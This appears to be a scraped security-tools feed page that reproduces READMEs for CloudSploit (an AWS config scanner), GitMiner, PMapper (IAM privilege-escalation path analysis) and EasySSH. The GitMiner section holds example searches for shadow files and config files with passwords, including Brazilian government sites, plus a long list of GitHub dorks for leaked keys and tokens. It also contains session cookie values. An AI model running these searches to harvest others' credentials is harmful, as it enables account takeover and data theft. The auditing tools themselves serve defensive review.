    4. Under "Managed Policy", click "Attach policy".
    5. In the filter box, enter "Security Audit"
    6. Select the "Security Audit" policy and save.

    Inline Policy (Not Recommended)
    If you'd prefer to be more restrictive, the following IAM policy contains the exact permissions used by the scan.
    WARNING: This policy will likely change as more plugins are written. If a test returns "UNKNOWN" it is likely missing a required permission. The preferred method is to use the "Security Audit" policy.
    {
    "Version": "2012-10-17",
    "Statement": [
    {
    "Action": [
    "cloudfront:ListDistributions",
    "cloudtrail:DescribeTrails",
    "configservice:DescribeConfigurationRecorders",
    "configservice:DescribeConfigurationRecorderStatus",
    "ec2:DescribeInstances",
    "ec2:DescribeSecurityGroups",
    "ec2:DescribeAccountAttributes",
    "ec2:DescribeAddresses",
    "ec2:DescribeVpcs",
    "ec2:DescribeFlowLogs",
    "ec2:DescribeSubnets",
    "elasticloadbalancing:DescribeLoadBalancerPolicies",
    "elasticloadbalancing:DescribeLoadBalancers",
    "iam:GenerateCredentialReport",
    "iam:ListServerCertificates",
    "iam:ListGroups",
    "iam:GetGroup",
    "iam:GetAccountPasswordPolicy",
    "iam:ListUsers",
    "iam:ListUserPolicies",
    "iam:ListAttachedUserPolicies",
    "kms:ListKeys",
    "kms:DescribeKey",
    "kms:GetKeyRotationStatus",
    "rds:DescribeDBInstances",
    "rds:DescribeDBClusters",
    "route53domains:ListDomains",
    "s3:GetBucketVersioning",
    "s3:GetBucketLogging",
    "s3:GetBucketAcl",
    "s3:ListBuckets",
    "ses:ListIdentities",
    "ses:getIdentityDkimAttributes"
    ],
    "Effect": "Allow",
    "Resource": "*"
    }
    ]
    }

    Running
    To run a standard scan, showing all outputs and results, simply run:
    node index.js

    Optional Plugins
    Some plugins may require additional permissions not outlined above. Since their required IAM permissions are not included in the SecurityAudit managed policy, these plugins are not included in the exports.js file by default. To enable these plugins, uncomment them from the exports.js file, if applicable, add the policies required to an inline IAM policy, and re-run the scan.

    Compliance
    CloudSploit also supports mapping of its plugins to particular compliance policies. To run the compliance scan, use the --compliance flag. For example:
    node index.js --compliance=hipaa
    CloudSploit currently supports the following compliance mappings:

    HIPAA
    HIPAA scans map CloudSploit plugins to the Health Insurance Portability and Accountability Act of 1996.

    Architecture
    CloudSploit works in two phases. First, it queries the AWS APIs for various metadata about your account. This is known as the "collection" phase. Once all the necessary data has been collected, the result is passed to the second phase - "scanning." The scan uses the collected data to search for potential misconfigurations, risks, and other security issues. These are then provided as output.

    Writing a Plugin

    Collection Phase
    To write a plugin, you must understand what AWS API calls your scan makes. These must be added to the collect.js file. This file determines the AWS API calls and the order in which they are made. For example:
    CloudFront: {
    listDistributions: {
    property: 'DistributionList',
    secondProperty: 'Items'
    }
    },
    This declaration tells the CloudSploit collection engine to query the CloudFront service using the listDistributions call and then save the results returned under DistributionList.Items.
    The second section in collect.js is postcalls, which is an array of objects defining API calls that rely on other calls being returned first. For example, if you need to first query for all EC2 instances, and then loop through each instance and run a more detailed call, you would add the EC2:DescribeInstances call in the first calls section and then add the more detailed call in postCalls setting it to rely on the output of DescribeInstances.
    An example:
    getGroup: {
    reliesOnService: 'iam',
    reliesOnCall: 'listGroups',
    filterKey: 'GroupName',
    filterValue: 'GroupName'
    },
    This section tells CloudSploit to wait until the IAM:listGroups call has been made, and then loop through the data that is returned. The filterKey tells CloudSploit the name of the key from the original response, while filterValue tells it which property to set in the getGroup call filter. For example: iam.getGroup({GroupName:abc}) where abc is the GroupName from the returned list. CloudSploit will loop through each response, re-invoking getGroup for each element.

    Scanning Phase
    After the data has been collected, it is passed to the scanning engine when the results are analyzed for risks. Each plugin must export the following:
    • Exports the following:
      • title (string): a user-friendly title for the plugin
      • category (string): the AWS category (EC2, RDS, ELB, etc.)
      • description (string): a description of what the plugin does
      • more_info (string): a more detailed description of the risk being tested for
      • link (string): an AWS help URL describing the service or risk, preferably with mitigation methods
      • recommended_action (string): what the user should do to mitigate the risk found
      • run (function): a function that runs the test (see below)
    • Accepts a collection object via the run function containing the full collection object obtained in the first phase.
    • Calls back with the results and the data source.

    Result Codes
    Each test has a result code that is used to determine if the test was successful and its risk level. The following codes are used:
    • 0: OKAY: No risks
    • 1: WARN: The result represents a potential misconfiguration or issue but is not an immediate risk
    • 2: FAIL: The result presents an immediate risk to the security of the account
    • 3: UNKNOWN: The results could not be determined (API failure, wrong permissions, etc.)

    Tips for Writing Plugins
    • Many security risks can be detected using the same API calls. To minimize the number of API calls being made, utilize the cache helper function to cache the results of an API call made in one test for future tests. For example, two plugins: "s3BucketPolicies" and "s3BucketPreventDelete" both call APIs to list every S3 bucket. These can be combined into a single plugin "s3Buckets" which exports two tests called "bucketPolicies" and "preventDelete". This way, the API is called once, but multiple tests are run on the same results.
    • Ensure AWS API calls are being used optimally. For example, call describeInstances with empty parameters to get all instances, instead of calling describeInstances multiple times looping through each instance name.
    • Use async.eachLimit to reduce the number of simultaneous API calls. Instead of using a for loop on 100 requests, spread them out using async's each limit.

    Example
    To more clearly illustrate writing a new plugin, let's consider the "IAM Empty Groups" plugin. First, we know that we will need to query for a list of groups via listGroups, then loop through each group and query for the more detailed set of data via getGroup.
    We'll add these API calls to collect.js. First, under calls add:
    IAM: {
    listGroups: {
    property: 'Groups'
    }
    },
    The property tells CloudSploit which property to read in the response from AWS.
    Then, under postCalls, add:
    IAM: {
    getGroup: {
    reliesOnService: 'iam',
    reliesOnCall: 'listGroups',
    filterKey: 'GroupName',
    filterValue: 'GroupName'
    }
    },
    CloudSploit will first get the list of groups, then, it will loop through each one, using the group name to get more detailed info via getGroup.
    Next, we'll write the plugin. Create a new file in the plugins/iam folder called emptyGroups.js (this plugin already exists, but you can create a similar one for the purposes of this example).
    In the file, we'll be sure to export the plugin's title, category, description, link, and more information about it. Additionally, we will add any API calls it makes:
    apis: ['IAM:listGroups', 'IAM:getGroup'],
    In the run function, we can obtain the output of the collection phase from earlier by doing:
    var listGroups = helpers.addSource(cache, source,
    ['iam', 'listGroups', region]);
    Then, we can loop through each of the results and do:
    var getGroup = helpers.addSource(cache, source,
    ['iam', 'getGroup', region, group.GroupName]);
    The helpers function ensures that the proper results are returned from the collection and that they are saved into a "source" variable which can be returned with the results.
    Now, we can write the plugin functionality by checking for the data relevant to our requirements:
    if (!getGroup || getGroup.err || !getGroup.data || !getGroup.data.Users) {
    helpers.addResult(results, 3, 'Unable to query for group: ' + group.GroupName, 'global', group.Arn);
    } else if (!getGroup.data.Users.length) {
    helpers.addResult(results, 1, 'Group: ' + group.GroupName + ' does not contain any users', 'global', group.Arn);
    return cb();
    } else {
    helpers.addResult(results, 0, 'Group: ' + group.GroupName + ' contains ' + getGroup.data.Users.length + ' user(s)', 'global', group.Arn);
    }
    The addResult function ensures we are adding the results to the results array in the proper format. This function accepts the following:
    (results array, score, message, region, resource)
    The resource is optional, and the score must be between 0 and 3 to indicate PASS, WARN, FAIL, or UNKNOWN.


    GitMiner v2.0 - Tool For Advanced Mining For Content On Github

    $
    0
    0

    Advanced search tool and automation in Github. This tool aims to facilitate research by code or code snippets on github through the site's search page.

    MOTIVATION
    Demonstrates the fragility of trust in public repositories to store codes with sensitive information.

    REQUIREMENTS
    lxml
    requests
    argparse
    json
    re

    INSTALL
    git clone http://github.com/UnkL4b/GitMiner

    sudo apt-get install python-requests python-lxml
    OR
    pip install -r requirements.txt

    Docker
    git clone http://github.com/UnkL4b/GitMiner
    cd GitMiner
    docker build -t gitminer .
    docker run -it gitminer -h

    HELP

    UnkL4b
    __ Automatic search for Github
    ((OO)) ▄████ ██▓▄▄▄█████▓ ███▄ ▄███▓ ██▓ ███▄ █ ▓█████ ██▀███
    \__/ ██▒ ▀█▒▓██▒▓ ██▒ ▓▒▓██▒▀█▀ ██▒▓██▒ ██ ▀█ █ ▓█ ▀ ▓██ ▒ ██▒ OO
    |^| ▒██░▄▄▄░▒██▒▒ ▓██░ ▒░▓██ ▓██░▒██▒▓██ ▀█ ██▒▒███ ▓██ ░▄█ ▒ oOo
    | | ░▓█ ██▓░██░░ ▓██▓ ░ ▒██ ▒██ ░██░▓██▒ ▐▌██▒▒▓█ ▄ ▒██▀▀█▄ OoO
    | | ░▒▓███▀▒░██░ ▒██▒ ░ ▒██▒ ░██▒░██░▒██░ ▓██░░▒████▒░██▓ ▒██▒ /oOo
    | |___░▒___▒_░▓____▒_░░___░_▒░___░__░░▓__░_▒░___▒_▒_░░_▒░_░░_▒▓_░▒▓░_/ /
    \______░___░__▒_░____░____░__░______░_▒_░░_░░___░_▒░_░_░__░__░▒_░_▒░__/ v2.0
    ░ ░ ░ ▒ ░ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░░ ░
    ░ ░ ░ ░ ░ ░ ░ ░

    -> github.com/UnkL4b
    -> unkl4b.github.io

    +---------------------[WARNING]---------------------+
    | DEVELOPERS ASSUME NO LIABILITY AND ARE NOT |
    | RESPONSIBLE FOR ANY MISUSE OR DAMAGE CAUSED BY |
    | THIS PROGRAM |
    +---------------------------------------------------+
    [-h] [-q 'filename:shadow path:etc']
    [-m wordpress] [-o result.txt]
    [-r '/^\s*.*?;?\s*$/gm']
    [-c _octo=GH1.1.2098292984896.153133829439; _ga=GA1.2.36424941.153192375318; user_session=oZIxL2_ajeDplJSndfl37ddaLAEsR2l7myXiiI53STrfhqnaN; __Host-user_session_same_site=oXZxv9_ajeDplV0gAEsmyXiiI53STrfhDN; logged_in=yes; dotcom_user=unkl4b; tz=America%2FSao_Paulo; has_recent_activity=1; _gh_sess=MmxxOXBKQ1RId3NOVGpGcG54aEVnT1o0dGhxdGdzWVpySnFRd1dVYUk5TFZpZXFuTWxOdW1FK1IyM0pONjlzQWtZM2xtaFR3ZDdxlGMCsrWnBIdnhUN0tjVUtMYU1GeG5Pbm5DMThuWUFETnZjcllGOUNkRGUwNUtKOVJTaGR5eUJYamhWRE5XRnMWZZN3Y3dlpFNDZXL1NWUEN4c093RFhQd3RJQ1NBdmhrVDE3VVNiUFF3dHBycC9FeDZ3cFVXV0ZBdXZieUY5WDRlOE9ZSG5sNmRHUmllcmk0Up1MTcyTXZrN1RHYmJSdz09--434afdd652b37745f995ab55fc83]

    optional arguments:
    -h, --help show this help message and exit
    -q 'filename:shadow path:etc', --query 'filename:shadow path:etc'
    Specify search term
    -m wordpress, --module wordpress
    Specify the search module
    -o result.txt, --output result.txt
    Specify the output file where it will be
    saved
    -r '/^\s*(.*?);?\s*$/gm', --regex '/^\s*(.*?);?\s*$/gm'
    Set regex to search in file
    -c _octo=GH1.1.2098292984896.153133829439; _ga=GA1.2.36424941.153192375318; user_session=oZIxL2_ajeDplJSndfl37ddaLAEsR2l7myXiiI53STrfhqnaN; __Host-user_session_same_site=oXZxv9_ajeDplV0gAEsmyXiiI53STrfhDN; logged_in=yes; dotcom_user=unkl4b; tz=America%2FSao_Paulo; has_recent_activity=1; _gh_sess=MmxxOXBKQ1RId3NOVGpGcG54aEVnT1o0dGhxdGdzWVpySnFRd1dVYUk5TFZpZXFuTWxOdW1FK1IyM0pONjlzQWtZM2xtaFR3ZDdxlGMCsrWnBIdnhUN0tjVUtMYU1GeG5Pbm5DMThuWUFETnZjcllGOUNkRGUwNUtKOVJTaGR5eUJYamhWRE5XRnMWZZN3Y3dlpFNDZXL1NWUEN4c093RFhQd3RJQ1NBdmhrVDE3VVNiUFF3dHBycC9FeDZ3cFVXV0ZBdXZieUY5WDRlOE9ZSG5sNmRHUmllcmk0Up1MTcyTXZrN1RHYmJSdz09--434afdd652b37745f995ab55fc83, --cookie _octo=GH1.1.2098292984896.153133829439; _ga=GA1.2.36424941.153192375318; user_session=oZIxL2_ajeDplJSndfl37ddaLAEsR2l7myXiiI53STrfhqnaN; __Host-user_session_same_site=oXZxv9_ajeDplV0gAEsmyXiiI53STrfhDN; logged_in=yes; dotcom_user=unkl4b; tz=America%2FSao_Paulo; has_recent_activity=1; _gh_sess=MmxxOXBKQ1RId3NOVGpGcG54aEVnT1o0dGhxdGdzWVpySnFRd1dVYUk5TFZpZXFuTWxOdW1FK1IyM0pONjlzQWtZM2xtaFR3ZDdxlGMCsrWnBIdnhUN0tjVUtMYU1GeG5Pbm5DMThuWUFETnZjcllGOUNkRGUwNUtKOVJTaGR5eUJYamhWRE5XRnMWZZN3Y3dlpFNDZXL1NWUEN4c093RFhQd3RJQ1NBdmhrVDE3VVNiUFF3dHBycC9FeDZ3cFVXV0ZBdXZieUY5WDRlOE9ZSG5sNmRHUmllcmk0Up1MTcyTXZrN1RHYmJSdz09--434afdd652b37745f995ab55fc83
    Specify the cookie for your github

    EXAMPLE
    Searching for wordpress configuration files with passwords:
    $:> python gitminer-v2.0.py -q 'filename:wp-config extension:php FTP_HOST in:file ' -m wordpress -c pAAAhPOma9jEsXyLWZ-16RTTsGI8wDawbNs4 -o result.txt


    Looking for brasilian government files containing passwords:
    $:> python gitminer-v2.0.py --query 'extension:php "root" in:file AND "gov.br" in:file' -m senhas -c pAAAhPOma9jEsXyLWZ-16RTTsGI8wDawbNs4
    Looking for shadow files on the etc paste:
    $:> python gitminer-v2.0.py --query 'filename:shadow path:etc' -m root -c pAAAhPOma9jEsXyLWZ-16RTTsGI8wDawbNs4
    Searching for joomla configuration files with passwords:
    $:> python gitminer-v2.0.py --query 'filename:configuration extension:php "public password" in:file' -m joomla -c pAAAhPOma9jEsXyLWZ-16RTTsGI8wDawbNs4


    Hacking SSH Servers


    Dork to search

    by @techgaun (https://github.com/techgaun/github-dorks)
    DorkDescription
    filename:.npmrc _authnpm registry authentication data
    filename:.dockercfg authdocker registry authentication data
    extension:pem privateprivate keys
    extension:ppk privateputtygen private keys
    filename:id_rsa or filename:id_dsaprivate ssh keys
    extension:sql mysql dumpmysql dump
    extension:sql mysql dump passwordmysql dump look for password; you can try varieties
    filename:credentials aws_access_key_idmight return false negatives with dummy values
    filename:.s3cfgmight return false negatives with dummy values
    filename:wp-config.phpwordpress config files
    filename:.htpasswdhtpasswd files
    filename:.env DB_USERNAME NOT homesteadlaravel .env (CI, various ruby based frameworks too)
    filename:.env MAIL_HOST=smtp.gmail.comgmail smtp configuration (try different smtp services too)
    filename:.git-credentialsgit credentials store, add NOT username for more valid results
    PT_TOKEN language:bashpivotaltracker tokens
    filename:.bashrc passwordsearch for passwords, etc. in .bashrc (try with .bash_profile too)
    filename:.bashrc mailchimpvariation of above (try more variations)
    filename:.bash_profile awsaws access and secret keys
    rds.amazonaws.com passwordAmazon RDS possible credentials
    extension:json api.forecast.iotry variations, find api keys/secrets
    extension:json mongolab.commongolab credentials in json configs
    extension:yaml mongolab.commongolab credentials in yaml configs (try with yml)
    jsforce extension:js conn.loginpossible salesforce credentials in nodejs projects
    SF_USERNAME salesforcepossible salesforce credentials
    filename:.tugboat NOT _tugboatDigital Ocean tugboat config
    HEROKU_API_KEY language:shellHeroku api keys
    HEROKU_API_KEY language:jsonHeroku api keys in json files
    filename:.netrc passwordnetrc that possibly holds sensitive credentials
    filename:_netrc passwordnetrc that possibly holds sensitive credentials
    filename:hub oauth_tokenhub config that stores github tokens
    filename:robomongo.jsonmongodb credentials file used by robomongo
    filename:filezilla.xml Passfilezilla config file with possible user/pass to ftp
    filename:recentservers.xml Passfilezilla config file with possible user/pass to ftp
    filename:config.json authsdocker registry authentication data
    filename:idea14.keyIntelliJ Idea 14 key, try variations for other versions
    filename:config irc_passpossible IRC config
    filename:connections.xmlpossible db connections configuration, try variations to be specific
    filename:express.conf path:.openshiftopenshift config, only email and server thou
    filename:.pgpassPostgreSQL file which can contain passwords
    filename:proftpdpasswdUsernames and passwords of proftpd created by cpanel
    filename:ventrilo_srv.iniVentrilo configuration
    [WFClient] Password= extension:icaWinFrame-Client infos needed by users to connect toCitrix Application Servers
    filename:server.cfg rcon passwordCounter Strike RCON Passwords
    JEKYLL_GITHUB_TOKENGithub tokens used for jekyll
    filename:.bash_historyBash history file
    filename:.cshrcRC file for csh shell
    filename:.historyhistory file (often used by many tools)
    filename:.sh_historykorn shell history
    filename:sshd_configOpenSSH server config
    filename:dhcpd.confDHCP service config
    filename:prod.exs NOT prod.secret.exsPhoenix prod configuration file
    filename:prod.secret.exsPhoenix prod secret
    filename:configuration.php JConfig passwordJoomla configuration file
    filename:config.php dbpasswdPHP application database password (e.g., phpBB forum software)
    path:sites databases passwordDrupal website database credentials
    shodan_api_key language:pythonShodan API keys (try other languages too)
    filename:shadow path:etcContains encrypted passwords and account information of new unix systems
    filename:passwd path:etcContains user account information including encrypted passwords of traditional unix systems
    extension:avastlicContains license keys for Avast! Antivirus
    extension:dbeaver-data-sources.xmlDBeaver config containing MySQL Credentials
    filename:.esmtprc passwordesmtp configuration
    extension:json googleusercontent client_secretOAuth credentials for accessing Google APIs
    HOMEBREW_GITHUB_API_TOKEN language:shellGithub token usually set by homebrew users
    xoxp OR xoxbSlack bot and private tokens
    .mlab.com passwordMLAB Hosted MongoDB Credentials
    filename:logins.jsonFirefox saved password collection (key3.db usually in same repo)
    filename:CCCam.cfgCCCam Server config file
    msg nickserv identify filename:configPossible IRC login passwords
    filename:settings.py SECRET_KEYDjango secret keys (usually allows for session hijacking, RCE, etc)


    PMapper - A Tool For Quickly Evaluating IAM Permissions In AWS

    $
    0
    0

    A project to speed up the process of reviewing an AWS account's IAM configuration.

    Purpose
    The goal of the AWS IAM auth system is to apply and enforce access controls on actions and resources in AWS. This tool helps identify if the policies in place will accomplish the intents of the account's owners.
    AWS already has tooling in place to check if policies attached to a resource will permit an action. This tool builds on that functionality to identify other potential paths for a user to get access to a resource. This means checking for access to other users, roles, and services as ways to pivot.

    How to Use
    1. Download this repository and install its dependencies with pip install -r requirements.txt .
    2. Ensure you have graphviz installed on your host.
    3. Setup an IAM user in your AWS account with a policy that grants the necessary permission to run this tool (see the file mapper-policy.json for an example). The ReadOnlyAccess managed policy works for this purpose. Grab the access keys created for this user.
    4. In the AWS CLI, set up a profile for that IAM user with the command: aws configure --profile <profile_name> where <profile_name> is a unique name.
    5. Run the command python pmapper.py --profile <profile_name> graph to begin pulling data about your account down to your computer.

    Graphing
    Principal Mapper has a graph subcommand, which does the heavy work of going through each principal in an account and finding any other principals it can access. The results are stored at ~/.principalmap and used by other subcommands.

    Querying
    Principal Mapper has a query subcommand that runs a user-defined query. The queries can check if one or more principals can do a given action with a given resource. The supported queries are:
    "can <Principal> do <Action> [with <Resource>]"
    "who can do <Action> [with <Resource>]"
    "preset <preset_query_name> <preset_query_args>"
    The first form checks if a principal, or any other principal accessible to it, could perform an action with a resource (default wildcard). The second form enumerates all principals that are able to perform an action with a resource.
    Note the quotes around the full query, that's so the argument parser knows to take the whole string.
    Note that <Principal> can either be the full ARN of a principal or the last part of that ARN (user/... or role/...).

    Presets
    The existing preset is priv_esc or change_perms, which have the same function. They describe which principals have the ability to change their own permissions. If a principal is able to change their own perms, then it effectively has unlimited perms.

    Visualizing
    The visualize subcommand produces a DOT and SVG file that represent the nodes and edges that were graphed.
    To create the DOT and SVG files, run the command: python pmapper.py visualize
    Currently the output is a directed graph, which collates all the edges with the same source and destination nodes. It does not draw edges where the source is an admin. Nodes for admins are colored blue. Nodes for users with the ability to access admins are colored red (potential priv-esc risk).

    Sample Output

    Pulling a graph
    esteringer@ubuntu:~/Documents/projects/Skywalker$ python pmapper.py graph
    Using profile: skywalker
    Pulling data for account [REDACTED]
    Using principal with ARN arn:aws:iam::[REDACTED]:user/TestingSkywalker
    [+] Starting EC2 checks.
    [+] Starting IAM checks.
    [+] Starting Lambda checks.
    [+] Starting CloudFormation checks.
    [+] Completed CloudFormation checks.
    [+] Completed EC2 checks.
    [+] Completed Lambda checks.
    [+] Completed IAM checks.
    Created an AWS Graph with 16 nodes and 53 edges
    [NODES]
    AWSNode("arn:aws:iam::[REDACTED]:user/AdminUser", properties={u'is_admin': True, u'type': u'user'})
    AWSNode("arn:aws:iam::[REDACTED]:user/EC2Manager", properties={u'is_admin': False, u'type': u'user'})
    AWSNode("arn:aws:iam::[REDACTED]:user/LambdaDeveloper", properties={u'is_admin': False, u'type': u'user'})
    AWSNode("arn:aws:iam::[REDACTED]:user/LambdaFullAccess", properties={u'is_admin': False, u'type': u'user'})
    AWSNode("arn:aws:iam::[REDACTED]:user/PowerUser", properties={u'is_admin': False, u'rootstr': u'arn:aws:iam::[REDACTED]:root', u'type': u'user'})
    AWSNode("arn:aws:iam::[REDACTED]:user/S3ManagementUser", properties={u'is_admin': False, u'type': u'user'})
    AWSNode("arn:aws:iam::[REDACTED]:user/S3ReadOnly", properties={u'is_admin': False, u'type': u'user'})
    AWSNode("arn:aws:iam::[REDACTED]:user/TestingSkywalker", properties={u'is_admin': False, u'type': u'user'})
    AWSNode("arn:aws:iam::[REDACTED]:role/AssumableRole", properties={u'is_admin': False, u'type': u'role', u'name': u'AssumableRole'})
    AWSNode("arn:aws:iam::[REDACTED]:role/EC2-Fleet-Manager", properties={u'is_admin': False, u'type': u'role', u'name': u'EC2-Fleet-Manager'})
    AWSNode("arn:aws:iam::[REDACTED]:role/EC2Role-Admin", properties={u'is_admin': True, u'type': u'role', u'name': u'EC2Role-Admin'})
    AWSNode("arn:aws:iam::[REDACTED]:role/EC2WithS3ReadOnly", properties={u'is_admin': False, u'type': u'role', u'name': u'EC2WithS3ReadOnly'})
    AWSNode("arn:aws:iam::[REDACTED]:role/EMR-Service-Role", properties={u'is_admin': False, u'type': u'role', u'name': u'EMR-Service-Role'})
    AWSNode("arn:aws:iam::[REDACTED]:role/LambdaRole-S3ReadOnly", properties={u'is_admin': False, u'type': u'role', u'name': u'LambdaRole-S3ReadOnly'})
    AWSNode("arn:aws:iam::[REDACTED]:role/ReadOnlyWithLambda", properties={u'is_admin': False, u'type': u'role', u'name': u'ReadOnlyWithLambda'})
    AWSNode("arn:aws:iam::[REDACTED]:role/UpdateCredentials", properties={u'is_admin': False, u'type': u'role', u'name': u'UpdateCredentials'})
    [EDGES]
    (0,1,'ADMIN','can use existing administrative privileges to access')
    (0,2,'ADMIN','can use existing administrative privileges to access')
    (0,3,'ADMIN','can use existing administrative privileges to access')
    (0,4,'ADMIN','can use existing administrative privileges to access')
    (0,5,'ADMIN','can use existing administrative privileges to access')
    (0,6,'ADMIN','can use existing administrative privileges to access')
    (0,7,'ADMIN','can use existing administrative privileges to access')
    (0,8,'ADMIN','can use existing administrative privileges to access')
    (0,9,'ADMIN','can use existing administrative privileges to access')
    (0,10,'ADMIN','can use existing administrative privileges to access')
    (0,11,'ADMIN','can use existing administrative privileges to access')
    (0,12,'ADMIN','can use existing administrative privileges to access')
    (0,13,'ADMIN','can use existing administrative privileges to access')
    (0,14,'ADMIN','can use existing administrative privileges to access')
    (0,15,'ADMIN','can use existing administrative privileges to access')
    (10,0,'ADMIN','can use existing administrative privileges to access')
    (10,1,'ADMIN','can use existing administrative privileges to access')
    (10,2,'ADMIN','can use existing administrative privileges to access')
    (10,3,'ADMIN','can use existing administrative privileges to access')
    (10,4,'ADMIN','can use existing administrative privileges to access')
    (10,5,'ADMIN','can use existing administrative privileges to access')
    (10,6,'ADMIN','can use existing administrative privileges to access')
    (10,7,'ADMIN','can use existing administrative privileges to access')
    (10,8,'ADMIN','can use existing administrative privileges to access')
    (10,9,'ADMIN','can use existing administrative privileges to access')
    (10,11,'ADMIN','can use existing administrative privileges to access')
    (10,12,'ADMIN','can use existing administrative privileges to access')
    (10,13,'ADMIN','can use existing administrative privileges to access')
    (10,14,'ADMIN','can use existing administrative privileges to access')
    (10,15,'ADMIN','can use existing administrative privileges to access')
    (1,9,'EC2_USEPROFILE','can create an EC2 instance and use an existing instance profile to access')
    (1,10,'EC2_USEPROFILE','can create an EC2 instance and use an existing instance profile to access')
    (1,11,'EC2_USEPROFILE','can create an EC2 instance and use an existing instance profile to access')
    (4,9,'EC2_USEPROFILE','can create an EC2 instance and use an existing instance profile to access')
    (4,10,'EC2_USEPROFILE','can create an EC2 instance and use an existing instance profile to access')
    (4,11,'EC2_USEPROFILE','can create an EC2 instance and use an existing instance profile to access')
    (3,13,'LAMBDA_CREATEFUNCTION','can create a Lambda function and pass an execution role to access')
    (3,14,'LAMBDA_CREATEFUNCTION','can create a Lambda function and pass an execution role to access')
    (3,15,'LAMBDA_CREATEFUNCTION','can create a Lambda function and pass an execution role to access')
    (9,10,'EC2_USEPROFILE','can create an EC2 instance and use an existing instance profile to access')
    (4,13,'LAMBDA_CREATEFUNCTION','can create a Lambda function and pass an execution role to access')
    (9,11,'EC2_USEPROFILE','can create an EC2 instance and use an existing instance profile to access')
    (4,8,'STS_ASSUMEROLE','can use STS to assume the role')
    (4,14,'LAMBDA_CREATEFUNCTION','can create a Lambda function and pass an execution role to access')
    (4,15,'LAMBDA_CREATEFUNCTION','can create a Lambda function and pass an execution role to access')
    (15,0,'IAM_CREATEKEY','can create access keys with IAM to access')
    (15,1,'IAM_CREATEKEY','can create access keys with IAM to access')
    (15,2,'IAM_CREATEKEY','can create access keys with IAM to access')
    (15,3,'IAM_CREATEKEY','can create access keys with IAM to access')
    (15,4,'IAM_CREATEKEY','can create access keys with IAM to access')
    (15,5,'IAM_CREATEKEY','can create access keys with IAM to access')
    (15,6,'IAM_CREATEKEY','can create access keys with IAM to access')
    (15,7,'IAM_CREATEKEY','can create access keys with IAM to access')

    Querying with the graph
    esteringer@ubuntu:~/Documents/projects/Skywalker$ ./pmapper.py --profile skywalker query "who can do s3:GetObject with *"
    user/AdminUser can do s3:GetObject with *
    user/EC2Manager can do s3:GetObject with * through role/EC2Role-Admin
    user/EC2Manager can create an EC2 instance and use an existing instance profile to access role/EC2Role-Admin
    role/EC2Role-Admin can do s3:GetObject with *
    user/LambdaFullAccess can do s3:GetObject with *
    user/PowerUser can do s3:GetObject with *
    user/S3ManagementUser can do s3:GetObject with *
    user/S3ReadOnly can do s3:GetObject with *
    user/TestingSkywalker can do s3:GetObject with *
    role/EC2-Fleet-Manager can do s3:GetObject with * through role/EC2Role-Admin
    role/EC2-Fleet-Manager can create an EC2 instance and use an existing instance profile to access role/EC2Role-Admin
    role/EC2Role-Admin can do s3:GetObject with *
    role/EC2Role-Admin can do s3:GetObject with *
    role/EC2WithS3ReadOnly can do s3:GetObject with *
    role/EMR-Service-Role can do s3:GetObject with *
    role/LambdaRole-S3ReadOnly can do s3:GetObject with *
    role/UpdateCredentials can do s3:GetObject with * through user/AdminUser
    role/UpdateCredentials can create access keys with IAM to access user/AdminUser
    user/AdminUser can do s3:GetObject with *

    Identifying Potential Privilege Escalation
    esteringer@ubuntu:~/Documents/projects/Skywalker$ ./pmapper.py --profile skywalker query "preset priv_esc user/PowerUser"
    Discovered a potential path to change privileges:
    user/PowerUser can change privileges because:
    user/PowerUser can access role/EC2Role-Admin because:
    user/PowerUser can create an EC2 instance and use an existing instance profile to access role/EC2Role-Admin
    and role/EC2Role-Admin can change its own privileges.

    Planned TODOs
    • Complete and verify Python 3 support.
    • Smarter control over rate of API requests (Queue, managing throttles).
    • Better progress reporting.
    • Validate and add more checks for obtaining credentials. Several services use service roles that grant the service permission to do an action within a user's account. This could potentially allow a user to obtain access to additional privileges.
    • Improving simulate calls (global conditions).
    • Completing priv esc checks (editing attached policies, attaching to a group).
    • Adding options for visualization (output type, edge collation).
    • Adding more caching.
    • Local policy evaluation?
    • Cross-account subcommand(s).
    • A preset to check if one principal is connected to another.
    • Handling policies for buckets or keys with services like S3 or KMS when querying.


    EasySSH - The SSH Connection Manager To Make Your Life Easier

    $
    0
    0


    A complete, efficient and easy-to-use manager. Create and edit connections, groups, customize the terminal, with multiple instances of the same connection.

    Developing and Building
    If you want to hack on and build EasySSH yourself, you'll need the following dependencies:
    • libgee-0.8-dev
    • libgtk-3-dev
    • libgranite-dev
    • libvte-2.91-dev
    • libjson-glib-dev
    • libunity-dev
    • meson
    • valac
    Run meson build to configure the build environment and run ninja test to build and run automated tests
    meson build --prefix=/usr
    cd build
    ninja test
    To install, use ninja install, then execute with com.github.muriloventuroso.easyssh
    sudo ninja install
    com.github.muriloventuroso.easyssh

    Install with Flatpak
    Install:
    flatpak install flathub com.github.muriloventuroso.easyssh
    Run:
    flatpak run com.github.muriloventuroso.easyssh


    Viewing all 5854 articles
    Browse latest View live


    <script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>